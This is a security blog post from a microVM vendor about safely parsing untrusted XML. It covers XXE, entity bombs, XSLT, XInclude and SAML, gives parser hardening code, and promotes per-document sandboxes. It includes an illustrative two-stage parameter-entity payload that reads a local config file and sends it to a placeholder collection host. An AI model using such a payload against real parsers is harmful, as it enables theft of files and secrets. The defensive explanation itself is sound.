all posts

Parsing Untrusted XML: The Format That Ships an Interpreter

Ajay Kumar··11 min read

I build PandaStack, an open-source Firecracker microVM platform, and the XML conversation has a shape I can predict now. Someone describes a service ingesting documents from outside the company — SAML assertions at their SSO front door, SOAP calls from a bank, regulatory filings, customer DOCX uploads, a feed crawler. I ask what the trust boundary around the parse is. The answer is a library version and a flag.

Not a process boundary. Not a network boundary. A flag, set at one call site, in one of the three XML libraries their dependency tree contains — and they can name two of the three.

XML is the format that keeps an interpreter in the specification. An external entity is not a bug; it is a documented feature that makes the parser read files and open sockets on behalf of whoever wrote the document. XXE is not a parser defect. It is the parser doing its job, correctly, for the wrong author.

A JSON parser that made an HTTP request would be a CVE with a catchy name. An XML parser that makes one is reading the document the way the spec says to, which is why no amount of secure-default library work retires it. And the surfaces where you still cannot avoid XML are, with a precision that feels deliberate, exactly the high-trust ones.

The short version: harden every parser you control, then stop treating those flags as a boundary — they are per-parser, per-call-site decisions in a codebase with three XML libraries in it. Run the parse in a throwaway microVM, one per document, no credential, no reason to reach your network, torn down unconditionally. The microVM is what makes the hardening's failure survivable.

XML ships an interpreter, and the spec says so

XML inherited document type definitions from SGML, and SGML came from a world where a document assembled itself out of parts on a filesystem. A manual was a skeleton plus a library of boilerplate, pulled together at parse time by a processor that knew how to go and get things. Entities are that mechanism — an indirection layer with retrieval semantics, and the spec's own word for the result is "replacement text."

So a conforming parser resolving a `SYSTEM` identifier is conformance, not compromise. You cannot fix that with a better parser any more than you can fix a shell's ability to run commands with a better shell. You can only turn the feature off — per parser, per call site, in every library, including the ones you did not choose. Hold that thought.

Where you still cannot avoid XML

XML is not merely a legacy interchange format you could migrate off. It is the substrate of the integration layer, and the integration layer is by definition where the author of the bytes is someone else.

  • SAML assertions. The one document you are contractually obliged to parse from a stranger before you know who they are. More below; it is worse than it looks.
  • SOAP endpoints. Finance, healthcare, insurance, telco, government. WS-Security means parsing a document whose job is to carry cryptographic material you have not verified.
  • XBRL filings and e-invoicing. Structured financial disclosure is XML, and European e-invoicing mandates are XML, received from entities whose only relationship to you is money owed one way or the other.
  • OOXML and ODF. A `.docx`, `.xlsx` or `.odt` is a zip container full of XML; every part is a parse, including the relationship graph in `_rels`. People model these as "documents" rather than "a dozen XML parses from one upload," which is the mental model that gets you hurt.
  • SVG uploads. XML with a scripting element, an external-reference surface and an entity surface — which you then serve from your own origin, as a bonus.
  • Feeds and reports. RSS and Atom: you chose the URL, not the bytes, and the bytes change every poll. DMARC aggregate reports: gzipped XML, mailed to your `rua` address by any mail server that decides to send one, at an address you published in DNS yourself as an invitation.
  • Build metadata in CI. `pom.xml`, `*.csproj`, `nuget.config`, `AndroidManifest.xml`. A runner building a fork's pull request parses whatever XML that fork contains, in a job that usually holds more credentials than anything else you own.

The pattern is not "old systems use XML." It is "systems crossing organisational boundaries use XML," which is the same sentence as "the author is a stranger." We standardised the format with an interpreter in it for exactly the documents we trust least — history rather than irony. XML won the interop wars by being expressive enough to assemble documents out of parts, and expressiveness is what we now spend our time subtracting.

The mechanics, precisely

You cannot reason about the boundary until you can name the doors, and two of them are not entity doors at all.

DTDs and entities

A doctype declaration carries an internal subset — declarations inline in square brackets — and an external subset, named by a `SYSTEM` or `PUBLIC` identifier the processor retrieves. Both declare entities.

An internal general entity is a macro: `<!ENTITY co "Example Ltd">`, referenced `&co;` — harmless, useful, and the mechanism behind every expansion bomb ever written. An external general entity adds a retrieval step: `<!ENTITY secret SYSTEM "file:///etc/hostname">`. When the parser reaches `&secret;` it opens the file and substitutes the contents.

Parameter entities and the out-of-band read

Parameter entities are entities for the DTD itself: declared `<!ENTITY % name "...">`, referenced `%name;`, legal only inside a DTD. They compose, and composition plus retrieval gives a channel needing nothing back from you. The enabling detail: inside the internal subset a parameter-entity reference may not appear within a markup declaration; inside the external subset it may. So the payload is two-stage — the document points at a DTD the author serves, and that DTD does the work.

<!-- ILLUSTRATIVE ONLY: the shape of a parameter-entity out-of-band read.
     Hosts under .invalid are reserved by RFC 2606 and resolve nowhere. -->

<!-- 1. The document you receive. Four lines. Looks boring. -->
<?xml version="1.0"?>
<!DOCTYPE invoice SYSTEM "http://dtd.example.invalid/invoice.dtd">
<invoice><id>7781</id></invoice>

<!-- 2. invoice.dtd, served by whoever wrote the document. In the EXTERNAL
     subset a parameter-entity reference IS permitted inside a markup
     declaration -- that is the entire trick. Stage one reads a local file;
     stage two pastes what it read into a URL, and the parser fetches it. -->
<!ENTITY % payload SYSTEM "file:///srv/app/config/settings.local">
<!ENTITY % build "<!ENTITY &#x25; out SYSTEM
    'http://collect.example.invalid/c?v=%payload;'>">
%build;
%out;

Notice what is absent: any need for your service to respond with anything. The data leaves over the parser's own outbound fetch, so your endpoint can return `400 Bad Request` for every one of these documents and remain a fully functional exfiltration channel — every error-handling test you wrote still passes. That is what makes XXE operationally nasty rather than merely bad: the success condition is on the other side of the wire, and your logs record a validation failure.

Entity expansion: billion laughs and quadratic blowup

Ten entities, each referencing the previous one ten times, is exponential — three kilobytes in, gigabytes out. Depth limits handle that, so the follow-up is quadratic blowup: one very large entity referenced tens of thousands of times. Shallow, boring, multiplies anyway.

Two precisions. First, this family uses internal entities: "we disabled external entity resolution" does nothing here — no network, no filesystem, just a parser doing arithmetic until the allocator gives up. Second, an expansion limit is genuinely complete for the bug it addresses, converting memory exhaustion into an exception. It is also an argument about a different attack, and I have watched it presented in review as though it covered the fetch. It does not. The fetch is a feature doing what features do.

XSLT, which is a programming language you deployed

XSLT is Turing-complete. If you accept a stylesheet from a user — a configurable report template, a tenant-supplied feed transform — you have shipped a scripting host and written it down in the feature list as "custom templates."

The capabilities are not subtle. `document()` fetches an arbitrary URI from inside the transform, which is request forgery with no entity involved, and `xsl:import` and `xsl:include` fetch stylesheets. In XSLT 2.0 and later `xsl:result-document` writes a result to a URI, and the XSLT 1.0 extension `exsl:document` does the same — so a transform writes files, a short walk from writing one something else later executes. Extension functions are the honest code-execution path: the Java and .NET reflection bridges, `php:function` in PHP's XSL extension, Saxon's evaluation extensions. They exist because enterprises needed them, and are exactly as dangerous as they sound.

Turn it off: `FEATURE_SECURE_PROCESSING` plus `ACCESS_EXTERNAL_STYLESHEET` and `ACCESS_EXTERNAL_DTD` set to empty in Java; libxslt's security preferences with file read, file write and network disabled; `--nonet` on the command line. Then notice that a locked-down processor still runs a Turing-complete program written by a stranger, on your kernel, with a timeout whose design document is the halting problem.

XInclude and schema fetching: doors that are not entity doors

This is the part that catches careful teams, because it survives the fix they made. XInclude is a separate processing layer with its own namespace, not DTD machinery, so every flag you set about entities and doctypes is irrelevant to it. It is off by default — Java's `setXIncludeAware`, lxml's explicit `xinclude()` — so the exposure is a line somebody wrote on purpose because a legitimate internal format needed it. And `parse="text"` means the included resource need not be well-formed XML, removing the wrinkle that made direct entity reads awkward.

The other non-entity door is schema fetching. A document carrying `xsi:schemaLocation` nominates its own schema; if you validate and your processor honours the hint, the document chose a URL for you to fetch, and XSD chains onward through `xs:import` and `xs:include`. Java gates this with `ACCESS_EXTERNAL_SCHEMA` — set it to empty. XML catalogs are a third variant: a mapping layer deciding what a `SYSTEM` identifier really resolves to.

Harden every parser you control, first

None of this argues against hardening. It is cheap, correct, and removes most real exposure, so do all of it before anything architectural. The per-ecosystem specifics, because vague advice is how this stays broken:

  • Python. `defusedxml` as the drop-in replacement for `xml.etree.ElementTree`, `xml.dom.minidom`, `xml.sax` and `xml.dom.pulldom`; it raises `DTDForbidden`, `EntitiesForbidden` or `ExternalReferenceForbidden` instead of resolving. `defusedxml.lxml` is deprecated, so for lxml you set `resolve_entities=False`, `load_dtd=False`, `no_network=True` and `huge_tree=False` yourself — and `resolve_entities` defaults to True, so that one is not optional.
  • Java. The most effective flag is `disallow-doctype-decl` on the `DocumentBuilderFactory`: refuse doctypes outright and most of this post's first half stops applying. Then `XMLConstants.FEATURE_SECURE_PROCESSING`, which turns on the entity-expansion and name limits — necessary, not by itself sufficient, which is the part people get wrong. Then `external-general-entities` and `external-parameter-entities` false, `load-external-dtd` false, `setXIncludeAware(false)`, and `ACCESS_EXTERNAL_DTD` / `ACCESS_EXTERNAL_SCHEMA` / `ACCESS_EXTERNAL_STYLESHEET` set to empty.
  • libxml2 and C. `XML_PARSE_NONET` forbids network access. The dangerous combination is `XML_PARSE_NOENT` with `XML_PARSE_DTDLOAD`, which bindings enable surprisingly often because somebody wanted `&nbsp;` to work. For one chokepoint rather than a flag audit, install your own loader via `xmlSetExternalEntityLoader` and have it refuse everything; `xmllint --nonet` on the command line. Defaults have moved in the safe direction across the 2.1x releases, which also means your behaviour is version-dependent.
  • .NET. `XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit` and `XmlResolver = null`. Modern defaults are far better than the 2010-era ones, so the risk lives in old code and old targets.
  • Go. `encoding/xml` does not resolve external entities at all. It is the boring one, and here boring is the highest compliment available.
# Hardening the parsers you DO control. Do all of it. None of it is a boundary.
from defusedxml.ElementTree import fromstring as safe_fromstring
from defusedxml.common import (
    DTDForbidden,
    EntitiesForbidden,
    ExternalReferenceForbidden,
)
from lxml import etree

MAX_BYTES = 8 * 1024 * 1024


class HostileDocument(Exception):
    """A 400 is what you tell the client. This is what you page on."""


def parse_stdlib(raw: bytes):
    # defusedxml refuses instead of resolving. Catch its three errors by name so
    # a rejected document is an audit event with a reason, not a generic failure.
    if len(raw) > MAX_BYTES:
        raise HostileDocument("larger than the parse budget")
    try:
        return safe_fromstring(raw)
    except (DTDForbidden, EntitiesForbidden, ExternalReferenceForbidden) as e:
        raise HostileDocument(type(e).__name__) from e


# defusedxml.lxml is deprecated, so for lxml you set the flags yourself -- on
# EVERY parser object you construct, because they are per-parser and per-call-site.
# That property is the whole argument of this post.
_PARSER = etree.XMLParser(
    resolve_entities=False,   # lxml defaults this to True. It is the load-bearing one.
    load_dtd=False,           # do not process or fetch the external DTD subset
    dtd_validation=False,
    no_network=True,          # already the default; set it so a reviewer can see it
    huge_tree=False,          # keep lxml's own depth and text-size ceilings in force
    recover=False,            # do not guess at malformed input on someone's behalf
)


def parse_lxml(raw: bytes):
    if len(raw) > MAX_BYTES:
        raise HostileDocument("larger than the parse budget")
    # XInclude is a SEPARATE layer: off until something calls root.xinclude(), and
    # no flag above would have stopped it. Never call it on a stranger's document.
    return etree.fromstring(raw, parser=_PARSER)


# Driving expat directly: refuse parameter entities outright. libexpat 2.4+ also
# ships billion-laughs protection by default (an amplification ratio plus an
# activation threshold), which turns an exponential memory curve into a
# ParseError. Correct outcome. No help at all against a fetch.
import xml.parsers.expat as expat

p = expat.ParserCreate()
p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

That code is good. Ship it. Now the argument.

Why a flag is a call site, not a boundary

A control is a boundary when you can state a property of the system. "This process cannot open a socket" is a property. "This parser, constructed at this line, with these arguments, refuses a doctype" is a configuration, and configurations have a plural problem.

Count the XML parsers in a mature service. The one you hardened. The one inside your SOAP or SAML library, which may not expose its configuration to you. The one inside the office-document text extractor you added for search indexing and nobody has thought about since. The one in your image library's SVG path. Your config loader. The one four levels down a dependency chain reading a vendor manifest. Three is the usual honest count; twice I have found five, and the fifth surprised the team both times.

Then count the call sites. The main ingest path, hardened and reviewed and tested. The validation endpoint added for customer onboarding. The preview renderer. And the one that gets you: the batch re-processing path, written at 11pm during an incident by copying an XML snippet out of a log message, because forty thousand documents needed re-ingesting by morning. That script is a scheduled job now, it has none of your flags, and nobody will read it again.

Underneath all of it: a perfectly hardened parser still parses. libxml2 and expat are C state machines chewing attacker-chosen bytes, they have had memory-safety CVEs, and they will have more. Hardening removes the feature-abuse class and nothing of the implementation-bug class — which is the one ending in code execution rather than a file read. "Is XXE closed in this repo?" has no grep-shaped answer.

The SSRF problem deserves its own section

When a parser fetches a `SYSTEM` URL, the fetch originates inside your network, from a process with your egress, your resolver, your routing table and in some architectures your service-mesh identity. Classically it reaches internal services, cloud metadata endpoints, and the loopback admin interface that is unauthenticated because only local processes can reach it.

The timing is the cruel part. Entity resolution happens during parsing — before your authorisation code runs, before signature verification, before you know who sent the document. Every identity-dependent control sits downstream of the fetch. The parser is a confused deputy with excellent connectivity.

So what does a microVM per parse do about this? The answer is partial, and worth being exact about. Each sandbox gets its own network namespace with a veth pair and a tap device, and the agent writes legacy `iptables` rules there: a PREROUTING DNAT per published port and a POSTROUTING SNAT to the slot address, plus one shared MASQUERADE for the pool CIDR in the root namespace. Egress is open by default — no default-deny policy. What exists instead is a small denylist in the root namespace's FORWARD chain, about ten rules in three classes.

Those classes matter for exactly this threat. Pool-to-pool traffic is dropped, so no sandbox reaches another sandbox's /30 — cross-tenant scanning is closed at the host. The whole of `169.254.0.0/16` is dropped, and the code comment calls it critical for a reason: on GCP that endpoint would hand out the host VM's full-scope service-account token, so the most-cited XXE-to-credential-theft path is fenced off before your parser gets a vote. And there is a DROP per well-known Stratum mining port.

So the microVM is the boundary for the host and the other tenants: one parse cannot read another document, touch another tenant's memory, reach the host kernel's syscall surface directly, or persist past teardown. The general internet is still reachable, though — an external entity can exfiltrate out of band to a host the author controls, and your own VPC, databases and internal APIs are still routable. That half is yours:

  1. Give the parse VM no network at all. Easiest to verify: the document arrives as bytes already in the guest, the result leaves as bytes read back out, and the parser has no legitimate reason to speak to anything. "No egress" is a property you check in one command; "correct egress" is a project with a roadmap.
  2. Deny by default, then allowlist up. The link-local range and the sandbox pool are already dropped; your own RFC 1918 ranges, VPC peerings, database subnets and internal APIs are not. Add filter rules for those, as code that runs for every sandbox rather than a runbook step.
  3. Force the parser through a proxy it cannot bypass. If you must resolve remote references — some e-invoicing and XBRL flows cite published schemas — install an entity resolver, `XmlResolver` or libxml2 loader that resolves nothing but a loopback address, and put a deliberately boring allowlisting fetcher there: caps size, caps redirects, no credential, parses nothing.
  4. Pin DNS. Resolve once, check the address against your deny list, connect to that address. A name that resolves to a public IP when you validate and an internal one when you connect is DNS rebinding, and it defeats allowlists that check names instead of addresses.

One related detail: Firecracker's own MMDS is wired on the NATID path and answered inside the VMM rather than forwarded, so it serves whatever the agent put there — a good reason to put nothing in it you would not hand a stranger.

Why a container is the wrong boundary here

The general container-versus-microVM argument is well worn; the XML version is three sentences. First, the thing you are running is an interpreter explicitly asked to read files and open sockets, over a C parser chewing attacker bytes, and namespaces plus cgroups are enforcement by a kernel every other tenant also calls into. A container is a polite suggestion to the kernel, and this document has already shown an interest in impolite behaviour.

Second, the resource attack is resource-shaped rather than bug-shaped. A billion-laughs document is not a defect you patch, it is a memory curve. A cgroup limit gives you an OOM kill whose victim is chosen by a score that has never heard of which tenant pays you, and CPU and page-cache pressure cross the boundary even when it does not fire.

Third — the one that catches people — a container's network namespace is usually the pod network, so the place you least wanted a `SYSTEM` fetch to originate is exactly where it originates. None of which makes containers bad. The only question is whether the payload is data or a program, and for XML the specification's answer is yes.

What a microVM per parse actually buys

  • Its own guest kernel. The parser's syscalls go to a kernel whose only job is this one document and which will not exist in a moment, so a kernel-reachable bug in the parse is a bug in a kernel nobody else shares.
  • A tiny device model. Firecracker exposes a handful of virtio devices — block, net, vsock, a serial console, the metadata service — rather than four decades of emulated hardware: small enough to be a reasonable thing to put between a stranger's document and your fleet. PandaStack runs `firecracker` directly inside the per-sandbox netns rather than under the jailer, which is a further hardening layer worth knowing about.
  • Unconditional teardown. The VM is deleted — not reset, not swept, not returned to a pool with its temp directories cleaned. No cleanup step can go wrong because there is none.
  • A per-job audit trail — which I would rank first, operationally. One document, one sandbox id, one log stream, one metrics series. A parse that tries something interesting dies with its own VM and leaves a record attributable to a single input, rather than a stack trace in a shared worker that handled four hundred documents this minute and cannot say which was the problem.

The cost argument has moved. On PandaStack every create is a snapshot restore — there is no warm pool of idle VMs — landing at p50 179 ms and p99 203 ms end to end. Inside that budget: `/snapshot/load` around 80 ms, Resume around 6 ms, the TCP probe on port 22 around 40 ms, the rootfs reflink about 4 ms, `firecracker` fork and exec about 25 ms. The first-ever spawn of a template is a cold boot of roughly 3 seconds, after which the agent bakes a snapshot and every later create takes the restore path.

One clarification, since it is the commonest misreading of our own numbers: `fork_tree(count)` is the memory-inheriting path, restoring from the parent's snapshot at 400-750 ms same-host and 1.2-3.5 s cross-host, whereas a bare `fork()` is a disk clone plus a cold boot that inherits none of the parent's memory. For one document per parse, a plain create at 179 ms beats both.

A worked architecture: parse-as-a-service

The shape I would build, as properties rather than a diagram, because properties survive your framework choice.

  1. The document crosses as bytes, over a request/response boundary, and the parser is handed a file path rather than a URL. Whatever the transport — vsock, an HTTP control plane, an exec channel — what matters is that it carries bytes rather than a shared address space, and the trusted side never dereferences anything the document names.
  2. The parser holds no credential. Not a narrowly scoped one. None: no cloud role, no database password, no internal service token, no API key in the environment. The question to ask about a parse process is not "what can it do" but "what is in reach," and the right answer is a document and a temp directory.
  3. The output is a validated normalised structure, not a pointer into the parse tree. Return JSON conforming to a schema you own, from fields you explicitly extracted, lengths capped. Handing back a live DOM or a lazy node defeats the exercise: a node that still knows how to fetch things is not a value, it is a deferred request run later in a trusted process.
  4. The wall clock is yours: a `timeout` and `ulimit -t` inside the guest, with a sandbox TTL comfortably above them, so the normal failure is a clean non-zero exit with usable stderr rather than a VM vanishing mid-write.
  5. Size limits apply before the VM exists — raw bytes, plus a decompressed-size budget for the zip-container formats. One document, one sandbox, no batching inside a guest: the second document in a recycled VM inherits the first one's consequences, and the point was that there are none.
import json
from pandastack import Sandbox

# The parser, as a file the guest will run. It imports defusedxml, writes one
# JSON object, and holds no credential because there is none in reach.
PARSE_PY = r"""
import json, sys
from defusedxml.ElementTree import parse

root = parse(sys.argv[1]).getroot()
out = {
    "root": root.tag,
    "invoice_id": (root.findtext("id") or "").strip()[:64],
    "line_count": len(root.findall("line")),
}
with open(sys.argv[2], "w") as fh:
    json.dump(out, fh)          # a value, not a live node
"""

# Fences in the shell, so a pathological document fails as a non-zero exit with
# usable stderr instead of a kernel OOM kill. The TTL is the backstop, not the plan.
FENCE = (
    "cd /work && umask 077 && "
    "ulimit -v 1048576; ulimit -t 20; ulimit -f 65536; ulimit -c 0; "
    "exec timeout --signal=TERM --kill-after=5s 20 "
    "python3 -I parse.py doc.xml out.json"
)


def parse_in_sandbox(doc: bytes, doc_id: str) -> dict:
    """One document, one microVM, one audit record. No reuse: the second document
    in a recycled guest inherits the first document's consequences."""
    sbx = Sandbox.create(
        template="code-interpreter",          # 2 GiB / 8 vCPU, baked
        ttl_seconds=120,                      # wall clock, enforced by the platform
        metadata={"job": "xml-parse", "doc": doc_id},
    )
    try:
        sbx.filesystem.write("/work/parse.py", PARSE_PY.encode())
        sbx.filesystem.write("/work/doc.xml", doc)   # bytes in, never a URL

        r = sbx.exec(FENCE, timeout_seconds=45)
        if r.exit_code != 0:
            # 124 from timeout, 1 from defusedxml refusing, 137 from an OOM kill
            # inside a guest that is nobody else's problem.
            raise HostileDocument(doc_id, r.exit_code, r.stderr[-2000:])

        out = sbx.filesystem.read("/work/out.json")
        if len(out) > 1 << 20:
            raise HostileDocument(doc_id, 0, "normalised output implausibly large")

        return validate(json.loads(out))      # YOUR schema, not the document's shape
    finally:
        sbx.kill()        # unconditional. A leaked sandbox bills by the GiB-hour,
                          # patiently, for as long as you fail to notice it.

The economics are not the interesting part, but people ask: $0.054 per vCPU-hour and $0.0162 per GiB-hour, the same for every class, CPU billed on CPU-seconds actually burned and memory on committed GiB-hours. No per-request price. A parse occupying a 2 GiB guest for two seconds is a small fraction of a cent — the kind of number where the meeting about it costs more than a year of it. What you buy is that a parse which tries something interesting becomes a deleted VM and a log line rather than an incident.

The SAML assertion, which is the joke writing itself

SAML is the purest expression of the problem in the catalogue. An assertion arrives at your service provider from a party you have not authenticated. It is signed, which is reassuring right up until you ask when the signature gets checked. To verify an XML signature you must first parse the document, because the signature is an element inside it referencing the content it covers, and then canonicalise the referenced subtree, because XML Signature operates on a canonical form rather than on bytes — and canonicalisation is itself an XML transformation. So the order is: parse an unauthenticated document, transform an unauthenticated document, then find out whether you should have been willing to do either.

So the SAML assertion is the one document you are contractually obliged to parse from a stranger before you know who they are, using a library that must transform it before it can tell you whether to trust it. The XML Signature Wrapping family lives in that same gap, between what the signature covers and what your application later reads. I have no cute fix — only an argument that the process doing all this should be as uninteresting a place to land as you can arrange.

Three boundaries, compared on what bites

Running untrusted XML three ways: architectural properties, not vendor claims. Library behaviours referenced throughout are version-dependent — verify against the version you ship.
DimensionHardened parser in-processContainer per parseMicroVM per parse
What the boundary isConstruction arguments on a parser object, per call site, per library.Namespaces and cgroups on the one host kernel every tenant calls into.Own guest kernel per document, small virtio device surface.
Blast radius of a libxml2 or expat bugYour application process, with everything it holds.Shared kernel; an escape is a host problem.A throwaway guest holding one document, deleted when the parse returns.
Where a SYSTEM fetch originatesInside your trusted service: its DNS, routing, identity.Usually the pod network — the worst available choice.A per-sandbox netns; metadata and sibling sandboxes fenced, your own VPC not.
Entity-bomb failure modeAn exception if you set a limit; an OOM in your process if not.An OOM kill whose victim is chosen by a score that ignores who pays you.A guest that dies alone, with an exit code and an attributable log.
Diagnosing it at 3amA stack trace from a worker that handled 400 documents this minute.Better, until the symptom is CPU saturation, which reads the same either way.One document, one sandbox id, one log stream, one metrics series.
Added latency per parseNone. The honest reason most people stop here.Tens of ms warm; a first image pull per node when cold.Snapshot restore on every create: p50 179 ms, p99 203 ms, no warm pool.

The honest limits

  • It does not make the parse correct. A hardened parser inside a microVM is two controls; either alone is one, and the unhardened-plus-microVM version is the wrong one to have picked. Do both; the ordering in this post is deliberate.
  • Egress is open by default, and I am saying it twice on purpose. Sibling sandboxes and the cloud metadata endpoint are already fenced off in the host's FORWARD chain; your own VPC is not. If your threat model includes the parse reaching an internal service, you add those deny rules yourself, as code, for every sandbox.
  • 179 ms is not free on a login. For batch work — filing ingest, document conversion, feed crawling, DMARC reports, CI parsing a fork's manifests — a per-parse VM is rounding error against the work itself. For an interactive SSO assertion on the hot path, adding roughly two hundred milliseconds plus teardown to every login is a real product decision. The honest SAML architecture is usually a thoroughly hardened in-process parser for the live assertion, plus per-parse VMs for the adjacent work you can move: metadata fetched at configuration time, scheduled refresh, forensics, bulk provisioning.
  • You have acquired a scheduler, plus a 5.10 guest kernel to check your toolchain against. Per-parse VMs mean capacity can run out, and at 3am a capacity incident and an attack look remarkably similar on the dashboard. Working-set memory admission helps — the scheduler admits against admittable memory rather than committed — but "no capacity" is a page you did not previously have.
  • Decompression limits are still yours. A microVM contains a zip bomb's consequences; it does not stop you paying for the CPU-seconds, or stop forty thousand of them arriving at once.
  • None of this helps if the normalised output is rendered unescaped. You extracted a string from a hostile document; it is still a hostile string. XXE's cousin is XSS, and the sandbox has no opinion about your templating layer.

The summary

XML keeps an interpreter in the specification. External entities make the parser fetch things for whoever wrote the document, and that is conformance rather than a defect — which is why two decades of secure-default work has not retired the class. XSLT is Turing-complete, XInclude and schema hints survive the entity fix, and expansion bombs need no network.

Harden every parser you control: `defusedxml` in Python, `disallow-doctype-decl` and secure processing in Java, `XML_PARSE_NONET` and your own entity loader in libxml2, `DtdProcessing.Prohibit` in .NET. Then accept what it is — a per-call-site configuration in a codebase with three XML libraries, one of which arrived transitively, plus an 11pm batch script that has none of your flags.

Then put the parse somewhere disposable. One microVM per document, no credential in reach, no network it does not need, a wall clock you own, a normalised JSON value as the only thing crossing back, and an unconditional `kill()`. The parse that tries something interesting dies with its own kernel and leaves a log line with a document id attached. That is not an elegant solution to XML — there is no elegant solution to XML. It is a survivable one, which after twenty-five years of this format is the honest target.

Frequently asked questions

Is XXE still a real problem in 2026, or have the libraries fixed it?

Defaults have genuinely improved and the bug class has genuinely not retired, for a structural reason: external entities are a specified feature of XML, not a parser defect, so fixing them means turning off something the specification says to do. Modern libxml2, .NET and Python's stdlib ship far safer defaults than their 2012 equivalents. What remains is the long tail: a mature service holds three or more XML parsers, at least one of which arrived transitively and does not expose its configuration to you. Flags are per-parser and per-call-site, so a hardened ingest path tells you nothing about the batch re-processing script, and defaults are a property of a version, so a dependency bump can flip one either way. Two of the doors are not entity doors at all: XInclude is a separate layer your entity flags do not touch, and `xsi:schemaLocation` lets a document nominate a URL for a validating processor to fetch.

Does a microVM stop an XXE payload from reaching my internal network?

Partly, and the division is worth knowing exactly. Two of the highest-value targets are already closed at the host: a denylist in the root namespace's FORWARD chain drops pool-to-pool traffic, so no sandbox reaches another sandbox's subnet, and drops the whole of `169.254.0.0/16`, so the cloud metadata endpoint — the classic XXE-to-credential-theft path, which on GCP would return the host VM's full-scope service-account token — is unreachable. What is not closed is the general internet and whatever else is routable: egress is open by default, with no default-deny policy, so an external-entity fetch can still exfiltrate out of band to a host the document's author controls, and can still reach your own VPC, databases and internal APIs if the sandbox can route to them. The microVM is the boundary for the host and the other tenants; your internal network is the remaining work. Give the parse VM no network at all where you can; otherwise add filter rules for your own ranges and peerings, force resolution through a loopback-only entity loader with an allowlisting fetcher behind it, and pin DNS.

Should I really run a microVM per SAML assertion on the login path?

Probably not, and the reason is latency rather than security. On PandaStack every create is a snapshot restore with no warm pool, landing at p50 179 ms and p99 203 ms end to end; add the parse and the teardown and you are putting roughly a quarter of a second into every login. For plenty of enterprise SSO that is defensible, since the flow already does several redirects and a round trip to an identity provider — but it is a product decision, not a free win. I would split the architecture. Harden the in-process parser for the live assertion thoroughly: refuse doctypes outright if your identity provider's assertions permit it, turn off external general and parameter entities, turn off XInclude, deny external schema and stylesheet access. Then move the adjacent work into per-parse VMs, because none of it is latency-sensitive: metadata fetched at configuration time, scheduled refresh, forensics on stored assertions, bulk provisioning uploads. SAML is hardest not because of the parsing but because signature verification requires parsing and canonicalising the document before you can decide whether to trust it.

Can I let customers supply their own XSLT stylesheets?

You can, if you are honest that you are shipping a scripting host and build accordingly. XSLT is Turing-complete. `document()` fetches arbitrary URIs from inside a transform, which is server-side request forgery with no entity involved. `xsl:import` and `xsl:include` fetch stylesheets. `xsl:result-document` in XSLT 2.0 and later, and the `exsl:document` extension in 1.0, write files to a URI. Extension functions are a genuine code-execution path: the Java and .NET reflection bridges, PHP's `php:function`, Saxon's evaluation extensions. Harden first — `FEATURE_SECURE_PROCESSING` plus `ACCESS_EXTERNAL_STYLESHEET` and `ACCESS_EXTERNAL_DTD` set to empty in Java, libxslt's security preferences with file read, write and network disabled, `--nonet` on the command line. Then recognise that a locked-down processor still executes a stranger's program on a kernel, with a timeout whose design document is the halting problem. A customer-supplied transform is the clearest case in this post for one microVM per execution: no credential in reach, a hard TTL, unconditional teardown.

Keep reading

Related posts

  • Per-Tenant Search Indexing in Isolated microVMs

    Multi-tenant search is a noisy-neighbor and data-leak minefield — one tenant's reindex starves everyone's queries, and a shared index is a leak waiting to happen. Give each tenant its own microVM.

  • Per-Tenant Isolation for Vector Embedding Jobs

    Your embedding worker pool parses customer PDFs, ships vectors to a model endpoint, and holds every tenant's documents in one address space. A PDF parser is a Turing-complete attack surface wearing a business-document costume. Give each tenant job its own microVM.

  • One microVM Per Claim: Isolating Insurance Claims Processing Per Carrier

    A claims pipeline is an API that invites strangers to upload files they chose, into a parser you did not write, on a machine holding four other carriers' data. One poisoned PDF and your incident report has more than one logo on it.

  • Your Tenant Wrote a Regex. The Regex Is the Malware.

    Your customer didn't ship malware, they shipped a pattern with a nested quantifier — and one long stack trace turns it into a fleet-wide outage. The failure modes of tenant-supplied log parsing, and the validation path that catches them before production does.

  • Per-Tenant AI Voice Transcription in MicroVMs

    Your transcription service holds a customer's support calls, a clinic's dictation, and somebody's deposition in the same Python process, with ffmpeg parsing whatever container format arrived. A malformed .wav is an unsolicited code-execution proposal. One microVM per tenant makes it a boring one.

More in Security & isolation · See PandaStack security

Run code in a microVM in one API call.

49ms p50 cold start. Fork, snapshot, and scale to zero.

Start free
Written by Ajay Kumar, Founder, PandaStack.